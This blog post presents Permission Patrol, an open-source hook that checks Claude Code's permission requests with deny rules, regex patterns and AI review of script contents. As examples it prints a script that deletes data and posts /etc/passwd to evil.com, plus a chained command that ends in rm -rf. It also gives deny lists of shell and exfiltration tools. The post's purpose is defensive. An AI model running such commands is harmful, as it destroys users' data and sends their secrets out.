<p><strong>Permission Patrol is the middle ground.</strong> It auto-allows safe operations (zero latency), auto-denies known-dangerous patterns (zero cost), and uses AI review only for the ambiguous cases that actually need human-level judgment. You get security without the friction.</p>

<h2 id="the-problem-claude-code-runs-scripts-blindly">The Problem: Claude Code Runs Scripts Blindly</h2>

<p><a href="https://docs.anthropic.com/en/docs/claude-code">Claude Code</a> is an incredible tool for software development. It can write code, run tests, manage git, and execute scripts — all autonomously. But that power comes with a risk.</p>

<p>When Claude Code asks permission to run <code class="language-plaintext highlighter-rouge">python3 script.py</code>, you see the command string. You click “Allow.” But what’s actually inside that script?</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># script.py - looks innocent as a command
</span><span class="kn">import</span> <span class="nn">shutil</span>
<span class="n">shutil</span><span class="p">.</span><span class="n">rmtree</span><span class="p">(</span><span class="s">"/home/user/important_data"</span><span class="p">)</span>  <span class="c1"># Hidden danger
</span></code></pre></div></div>

<p>This is the gap I wanted to close. And it’s not just scripts — there’s another class of commands that’s equally dangerous.</p>

<h3 id="scenario-1-long-chained-commands-nobody-has-time-to-review">Scenario 1: Long Chained Commands Nobody Has Time to Review</h3>

<p>Claude Code often generates long, chained bash commands. When you see something like this in the permission prompt, do you really read every part?</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd</span> /tmp <span class="o">&amp;&amp;</span> git clone https://github.com/some/repo.git <span class="o">&amp;&amp;</span> <span class="nb">cd </span>repo <span class="se">\</span>
  <span class="o">&amp;&amp;</span> pip <span class="nb">install</span> <span class="nt">-r</span> requirements.txt <span class="o">&amp;&amp;</span> python3 setup.py build <span class="se">\</span>
  <span class="o">&amp;&amp;</span> <span class="nb">cp</span> <span class="nt">-r</span> dist/<span class="k">*</span> /usr/local/lib/ <span class="o">&amp;&amp;</span> <span class="nb">chmod</span> <span class="nt">-R</span> 755 /usr/local/lib/project <span class="se">\</span>
  <span class="o">&amp;&amp;</span> systemctl restart app <span class="se">\</span>
  <span class="o">&amp;&amp;</span> curl <span class="nt">-X</span> POST https://hooks.slack.com/services/T00/B00/xxx <span class="nt">-d</span> <span class="s1">'{"text":"deployed"}'</span> <span class="se">\</span>
  <span class="o">&amp;&amp;</span> <span class="nb">rm</span> <span class="nt">-rf</span> /tmp/repo
</code></pre></div></div>

<p>Did you spot the <code class="language-plaintext highlighter-rouge">curl -X POST</code> exfiltrating data to an external webhook? Or the <code class="language-plaintext highlighter-rouge">rm -rf</code> buried at the very end? In a wall of <code class="language-plaintext highlighter-rouge">&amp;&amp;</code>-chained commands, dangerous operations hide in plain sight. Permission Patrol’s regex engine catches both automatically — no AI call needed.</p>

<h3 id="scenario-2-innocent-script-hiding-dangerous-code">Scenario 2: Innocent Script Hiding Dangerous Code</h3>

<p>This is the more subtle problem. The command looks completely harmless:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 scripts/cleanup_cache.py
</code></pre></div></div>

<p>But <code class="language-plaintext highlighter-rouge">cleanup_cache.py</code> might contain:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">shutil</span><span class="p">,</span> <span class="n">requests</span>

<span class="n">shutil</span><span class="p">.</span><span class="n">rmtree</span><span class="p">(</span><span class="s">"/home/user/important_data"</span><span class="p">)</span>
<span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="s">"https://evil.com/exfil"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="nb">open</span><span class="p">(</span><span class="s">"/etc/passwd"</span><span class="p">).</span><span class="n">read</span><span class="p">())</span>
</code></pre></div></div>

<p>A standard permission hook only sees the command string <code class="language-plaintext highlighter-rouge">python3 scripts/cleanup_cache.py</code> — it has <strong>no idea</strong> what’s inside the file. Permission Patrol reads the script content (up to 5KB) and sends it to Claude for AI security review.</p>

<h2 id="why-prompt-hooks-fall-short">Why Prompt Hooks Fall Short</h2>

<p>Claude Code supports <a href="https://docs.anthropic.com/en/docs/claude-code/hooks">hooks</a> — custom logic that runs when permission is requested. There are two types:</p>

<ul>
  <li><strong>Prompt hooks</strong> (<code class="language-plaintext highlighter-rouge">type: "prompt"</code>): An LLM reviews the request. Simple to set up, but it <strong>only sees the command string</strong>. It sees <code class="language-plaintext highlighter-rouge">python3 script.py</code>, not what’s inside the file.</li>
  <li><strong>Command hooks</strong> (<code class="language-plaintext highlighter-rouge">type: "command"</code>): A script runs to make the decision. It can do anything — including <strong>reading the file content</strong>.</li>
</ul>

<p>A prompt hook would happily approve <code class="language-plaintext highlighter-rouge">python3 script.py</code> because the command looks harmless. It has no way to know the script deletes your data.</p>

<h2 id="the-solution-permission-patrol">The Solution: Permission Patrol</h2>

<p><a href="https://github.com/stillcuriouscat/permission-patrol">Permission Patrol</a> is a command hook that adds a multi-layer security review:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Request arrives
    |
    +-- settings.json deny? --&gt; Reject (no API call)
    |   (rm -rf, curl POST, scp, gh repo delete...)
    |
    +-- settings.json allow? --&gt; Pass (no API call)
    |   (git status, ls, Read, ruff, gh...)
    |
    +-- Neither? --&gt; permission-guard.py hook
         |
         +-- Dangerous regex? --&gt; Deny immediately
         |
         +-- Script execution? --&gt; Read file, Claude reviews content
         |
         +-- Sensitive / outside project? --&gt; Claude reviews, user decides
         |
         +-- Other cases? --&gt; Claude reviews the request
</code></pre></div></div>

<h3 id="how-the-hook-receives-requests">How the Hook Receives Requests</h3>

<p>Claude Code sends a JSON object to the hook’s stdin via the <code class="language-plaintext highlighter-rouge">PermissionRequest</code> event. The hook reads <code class="language-plaintext highlighter-rouge">tool_name</code>, <code class="language-plaintext highlighter-rouge">tool_input</code>, and <code class="language-plaintext highlighter-rouge">cwd</code> to understand what Claude wants to do:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Claude Code pipes this JSON to the hook's stdin
</span><span class="n">request</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">stdin</span><span class="p">)</span>
<span class="n">tool_name</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"tool_name"</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>    <span class="c1"># e.g. "Bash", "Write", "WebFetch"
</span><span class="n">tool_input</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"tool_input"</span><span class="p">,</span> <span class="p">{})</span>  <span class="c1"># e.g. {"command": "python3 script.py"}
</span><span class="n">cwd</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"cwd"</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>               <span class="c1"># working directory
</span></code></pre></div></div>

<h3 id="how-the-hook-returns-decisions">How the Hook Returns Decisions</h3>

<p>The hook communicates back to Claude Code by printing JSON to stdout. Three possible decisions:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Allow — Claude Code proceeds without prompting the user
</span><span class="k">def</span> <span class="nf">allow</span><span class="p">():</span>
    <span class="k">print</span><span class="p">(</span><span class="n">json</span><span class="p">.</span><span class="n">dumps</span><span class="p">({</span>
        <span class="s">"hookSpecificOutput"</span><span class="p">:</span> <span class="p">{</span>
            <span class="s">"hookEventName"</span><span class="p">:</span> <span class="s">"PermissionRequest"</span><span class="p">,</span>
            <span class="s">"decision"</span><span class="p">:</span> <span class="p">{</span><span class="s">"behavior"</span><span class="p">:</span> <span class="s">"allow"</span><span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}))</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>

<span class="c1"># Deny — Claude Code blocks the action with a reason
</span><span class="k">def</span> <span class="nf">deny</span><span class="p">(</span><span class="n">reason</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">json</span><span class="p">.</span><span class="n">dumps</span><span class="p">({</span>
        <span class="s">"hookSpecificOutput"</span><span class="p">:</span> <span class="p">{</span>
            <span class="s">"hookEventName"</span><span class="p">:</span> <span class="s">"PermissionRequest"</span><span class="p">,</span>
            <span class="s">"decision"</span><span class="p">:</span> <span class="p">{</span><span class="s">"behavior"</span><span class="p">:</span> <span class="s">"deny"</span><span class="p">,</span> <span class="s">"message"</span><span class="p">:</span> <span class="n">reason</span><span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}))</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>

<span class="c1"># Ask user — exit 0 with NO JSON output
# Claude Code falls back to showing the standard permission dialog
</span><span class="k">def</span> <span class="nf">ask_user</span><span class="p">():</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>  <span class="c1"># no output = let user decide
</span></code></pre></div></div>

<h3 id="deterministic-rules-zero-cost">Deterministic Rules (Zero Cost)</h3>

<p>Common operations are handled by <code class="language-plaintext highlighter-rouge">settings.json</code> allow/deny rules — no API call, no latency:</p>

<ul>
  <li><strong>Deny</strong>: <code class="language-plaintext highlighter-rouge">rm -rf</code>, <code class="language-plaintext highlighter-rouge">shred</code>, <code class="language-plaintext highlighter-rouge">curl POST</code>, <code class="language-plaintext highlighter-rouge">scp</code>, <code class="language-plaintext highlighter-rouge">gh repo delete</code></li>
  <li><strong>Allow</strong>: <code class="language-plaintext highlighter-rouge">git status</code>, <code class="language-plaintext highlighter-rouge">ls</code>, <code class="language-plaintext highlighter-rouge">Read</code>, <code class="language-plaintext highlighter-rouge">ruff</code>, <code class="language-plaintext highlighter-rouge">mypy</code>, <code class="language-plaintext highlighter-rouge">eslint</code>, trusted domains</li>
</ul>

<p>The hook also has its own regex layer for patterns that slip past <code class="language-plaintext highlighter-rouge">settings.json</code> (e.g., <code class="language-plaintext highlighter-rouge">rm /home/...</code>, <code class="language-plaintext highlighter-rouge">dd of=/dev/</code>, reverse shell patterns).</p>

<h3 id="script-content-inspection-the-key-feature">Script Content Inspection (The Key Feature)</h3>

<p>When you run <code class="language-plaintext highlighter-rouge">python3 script.py</code>, <code class="language-plaintext highlighter-rouge">pytest</code>, or <code class="language-plaintext highlighter-rouge">node app.js</code>, the hook:</p>

<ol>
  <li>Detects the script execution pattern</li>
  <li><strong>Reads the actual file content</strong> (up to 5KB)</li>
  <li>Sends both the command and script content to Claude for review</li>
  <li>Claude checks for dangerous patterns: <code class="language-plaintext highlighter-rouge">shutil.rmtree</code>, <code class="language-plaintext highlighter-rouge">os.remove</code>, <code class="language-plaintext highlighter-rouge">requests.post</code>, code injection, etc.</li>
  <li>Returns allow/deny/ask based on the analysis</li>
</ol>

<p>Here’s how the script content is injected into the review prompt — this is the part prompt hooks simply cannot do:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Detect script execution and read the file
</span><span class="n">script_match</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span>
    <span class="sa">r</span><span class="s">'\b(python|python3|node|bash|sh)\s+([^\s;|&amp;]+)'</span><span class="p">,</span> <span class="n">command</span>
<span class="p">)</span>
<span class="k">if</span> <span class="n">script_match</span><span class="p">:</span>
    <span class="n">script_path</span> <span class="o">=</span> <span class="n">script_match</span><span class="p">.</span><span class="n">group</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">script_full_path</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">script_content</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()[:</span><span class="mi">5000</span><span class="p">]</span>  <span class="c1"># read up to 5KB
</span>
<span class="c1"># Build the review prompt with script content included
</span><span class="n">prompt</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"""You are a security reviewer for Claude Code.

## Request Information
- Tool: </span><span class="si">{</span><span class="n">tool_name</span><span class="si">}</span><span class="s">
- Parameters: </span><span class="si">{</span><span class="n">json</span><span class="p">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">tool_input</span><span class="p">)</span><span class="si">}</span><span class="s">

## Script Content
```
</span><span class="si">{</span><span class="n">script_content</span><span class="si">}</span><span class="s">
```

## Response Format (pure JSON)
{{"decision": "allow"}}
or {{"decision": "deny", "reason": "..."}}
or {{"decision": "ask", "reason": "..."}}
"""</span>
</code></pre></div></div>

<h3 id="calling-claude-cli-no-api-key-required">Calling Claude CLI (No API Key Required)</h3>

<p>The hook calls Claude CLI in print mode, which uses your existing Claude Code subscription — no separate API key needed:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">run</span><span class="p">(</span>
    <span class="p">[</span><span class="s">"claude"</span><span class="p">,</span> <span class="s">"-p"</span><span class="p">,</span> <span class="n">prompt</span><span class="p">,</span> <span class="s">"--model"</span><span class="p">,</span> <span class="s">"opus"</span><span class="p">,</span> <span class="s">"--output-format"</span><span class="p">,</span> <span class="s">"text"</span><span class="p">],</span>
    <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">30</span>
<span class="p">)</span>
<span class="n">parsed</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">strip</span><span class="p">())</span>
<span class="n">decision</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">[</span><span class="s">"decision"</span><span class="p">]</span>  <span class="c1"># "allow", "deny", or "ask"
</span></code></pre></div></div>

<h3 id="path-aware-decisions">Path-Aware Decisions</h3>

<p>Even when Claude approves, the hook adds extra safety based on path classification:</p>

<ul>
  <li><strong>Inside project directory</strong>: Claude can auto-approve</li>
  <li><strong>Outside project / sensitive paths</strong> (<code class="language-plaintext highlighter-rouge">~/.ssh</code>, <code class="language-plaintext highlighter-rouge">/etc/</code>, <code class="language-plaintext highlighter-rouge">.env</code>): User always has the final say — Claude’s verdict is advisory only</li>
  <li>Desktop notification on Linux so you know Claude already reviewed it</li>
</ul>

<h2 id="no-api-key-required">No API Key Required</h2>

<p>Permission Patrol calls Claude CLI internally, which uses your Claude Code subscription quota. No separate API key, no extra cost setup. Just install and go.</p>

<h2 id="getting-started">Getting Started</h2>

<h3 id="1-clone-the-repo">1. Clone the repo</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/stillcuriouscat/permission-patrol.git
</code></pre></div></div>

<h3 id="2-merge-permissions-into-your-settings">2. Merge permissions into your settings</h3>

<p>Add the allow/deny rules from <code class="language-plaintext highlighter-rouge">permissions.json</code> to your <code class="language-plaintext highlighter-rouge">~/.claude/settings.json</code>:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"permissions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"allow"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"Bash(git *)"</span><span class="p">,</span><span class="w">
      </span><span class="s2">"Bash(gh *)"</span><span class="p">,</span><span class="w">
      </span><span class="s2">"WebFetch(domain:github.com)"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"deny"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"Bash(rm -rf *)"</span><span class="p">,</span><span class="w">
      </span><span class="s2">"Bash(gh repo delete *)"</span><span class="w">
    </span><span class="p">]</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<h3 id="3-add-the-hook">3. Add the hook</h3>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"hooks"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"PermissionRequest"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="p">{</span><span class="w">
        </span><span class="nl">"matcher"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"hooks"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
          </span><span class="p">{</span><span class="w">
            </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"command"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"command"</span><span class="p">:</span><span class="w"> </span><span class="s2">"python3 /path/to/permission-patrol/permission-guard.py"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"timeout"</span><span class="p">:</span><span class="w"> </span><span class="mi">30000</span><span class="w">
          </span><span class="p">}</span><span class="w">
        </span><span class="p">]</span><span class="w">
      </span><span class="p">}</span><span class="w">
    </span><span class="p">]</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<h3 id="4-restart-claude-code">4. Restart Claude Code</h3>

<p>That’s it. Permission Patrol is now guarding your sessions.</p>

<h2 id="what-i-learned-building-this">What I Learned Building This</h2>

<ol>
  <li>
    <p><strong>Command hooks are underrated.</strong> Most examples use prompt hooks, but command hooks can do so much more — read files, check network state, verify git status.</p>
  </li>
  <li>
    <p><strong>Deterministic rules first, AI second.</strong> Using <code class="language-plaintext highlighter-rouge">settings.json</code> rules for common patterns means zero latency and zero cost for 90% of operations. AI review is reserved for the ambiguous cases.</p>
  </li>
  <li>
    <p><strong>Defense in depth.</strong> No single check is perfect. Combining regex patterns, file content inspection, path checks, and AI review creates multiple layers of security.</p>
  </li>
</ol>

<h2 id="frequently-asked-questions">Frequently Asked Questions</h2>

<h3 id="does-permission-patrol-work-with---dangerously-skip-permissions">Does Permission Patrol work with <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code>?</h3>

<p>No — and that’s the point. <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code> disables <strong>all</strong> permission checks, including hooks. Permission Patrol is designed for normal mode, where it replaces the manual “Allow/Deny” workflow with automated, intelligent review. You get the speed of skip-permissions with the safety of human review.</p>

<h3 id="how-is-a-command-hook-different-from-a-prompt-hook">How is a command hook different from a prompt hook?</h3>

<p>A <strong>prompt hook</strong> asks an LLM to review the command string (e.g., <code class="language-plaintext highlighter-rouge">python3 script.py</code>). A <strong>command hook</strong> runs a script that can do anything — including reading the actual file content before execution. Permission Patrol uses a command hook so it can inspect what’s <em>inside</em> scripts, not just the command name.</p>

<h3 id="does-it-require-a-separate-api-key">Does it require a separate API key?</h3>

<p>No. Permission Patrol calls <code class="language-plaintext highlighter-rouge">claude</code> CLI internally, which uses your existing Claude Code subscription. No extra API key, no additional cost.</p>

<h3 id="what-dangerous-patterns-does-it-catch">What dangerous patterns does it catch?</h3>

<p>Permission Patrol catches patterns in two layers:</p>

<ul>
  <li><strong>Regex (instant, no AI):</strong> <code class="language-plaintext highlighter-rouge">rm -rf</code>, <code class="language-plaintext highlighter-rouge">shred</code>, <code class="language-plaintext highlighter-rouge">curl POST</code>, <code class="language-plaintext highlighter-rouge">scp</code>, <code class="language-plaintext highlighter-rouge">wget</code>, <code class="language-plaintext highlighter-rouge">chmod 777</code>, data exfiltration commands</li>
  <li><strong>AI review (Claude):</strong> <code class="language-plaintext highlighter-rouge">shutil.rmtree()</code>, <code class="language-plaintext highlighter-rouge">os.remove()</code>, <code class="language-plaintext highlighter-rouge">requests.post()</code>, obfuscated code, file system access outside the project, code injection patterns</li>
</ul>

<h3 id="does-it-slow-down-claude-code">Does it slow down Claude Code?</h3>

<p>Deterministic allow/deny rules add near-zero latency. AI review takes a few seconds via Claude CLI — only triggered for ambiguous cases like script execution or sensitive paths. In practice, 90%+ of operations are handled by deterministic rules instantly.</p>

<h3 id="can-i-customize-the-allowdeny-rules">Can I customize the allow/deny rules?</h3>

<p>Yes. Edit the <code class="language-plaintext highlighter-rouge">permissions</code> section in your <code class="language-plaintext highlighter-rouge">~/.claude/settings.json</code>. Add patterns to <code class="language-plaintext highlighter-rouge">allow</code> for commands you trust, or <code class="language-plaintext highlighter-rouge">deny</code> for commands you want blocked. The rules use glob patterns like <code class="language-plaintext highlighter-rouge">Bash(git *)</code> or <code class="language-plaintext highlighter-rouge">Bash(rm -rf *)</code>.</p>

<h2 id="links">Links</h2>

<ul>
  <li><strong>GitHub</strong>: <a href="https://github.com/stillcuriouscat/permission-patrol">stillcuriouscat/permission-patrol</a></li>
  <li><strong>Claude Code Hooks Docs</strong>: <a href="https://docs.anthropic.com/en/docs/claude-code/hooks">docs.anthropic.com</a></li>
  <li><strong>License</strong>: MIT — use it, fork it, improve it.</li>
</ul>

<hr />

<p><em>If you’re using Claude Code for development, give Permission Patrol a try. And if you find a dangerous pattern it doesn’t catch, open an issue — security is a community effort.</em></p>]]></content><author><name>stillcuriouscat</name></author><category term="Projects" /><category term="claude-code" /><category term="ai-security" /><category term="hooks" /><category term="command-hook" /><category term="python" /><category term="open-source" /><category term="dangerously-skip-permissions" /><category term="prompt-injection" /><category term="defense-in-depth" /><category term="script-inspection" /><summary type="html"><![CDATA[Stop using --dangerously-skip-permissions. Permission Patrol is an open-source command hook that reads script content before Claude Code executes it — catching hidden rm -rf, data exfiltration, and prompt injection that prompt hooks can't see.]]></summary></entry></feed>